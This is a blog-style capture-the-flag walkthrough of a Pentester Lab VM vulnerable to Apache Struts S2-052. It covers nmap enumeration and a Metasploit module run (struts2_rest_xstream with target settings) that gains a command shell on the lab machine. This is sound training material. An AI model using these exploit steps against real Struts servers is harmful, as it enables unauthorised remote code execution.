Hack The Vulnhub Pentester Lab: S2-052


Hello friend!! Today we are going to exploit another VM lab which is designed by Pentester Lab covers the exploitation of the Struts S2-052 vulnerability. The REST Plugin is using a XStreamHandler with an instance of XStream for deserialization without any type filtering and this can lead to Remote Code Execution when deserializing XML payloads.
Source: https://cwiki.apache.org/confluence/display/WW/S2-052
Table of content
§  Introduction
§  Download VM
§  Enumeration (Nmap)
§  Surfing Port 80
§  Exploit the target (Metasploit)
Let’s Exploit!!
Download it from here and run this VM. Then check its network configuration through ifconfig command.




Since target belongs to 192.168.1.103 network, let’s go for its enumeration with help of nmap following command to identify running service and version.
nmap -A 192.168.1.103
From nmap scanning result we enumerated following details:
Http-server-header: Apache-coyote/1.1
Http-title: orders
Requested resource: /order.xhtml




So when we have explored /order.xhtml through the web browser it put up following webpage.




Further, we explore user Bob it brings us inside order3 web page.




Since the author has already declared that is vm is vulnerable to the Struts S2-052 therefore with the help of following module of metasploit we can directly exploit it to obtain command shell of target vm.
msf > use exploit/multi/http/struts2_rest_xstream
msf exploit(multi/http/struts2_rest_xstream) > set rhost 192.168.1.103
msf exploit(multi/http/struts2_rest_xstream) > set rport 80
msf exploit(multi/http/struts2_rest_xstream) > set TARGETURI /orders/3
msf exploit(multi/http/struts2_rest_xstream) > exploit
BOOOOOOM!!! Here we owned the command shell of victim’s vm.


0 comments:

Post a Comment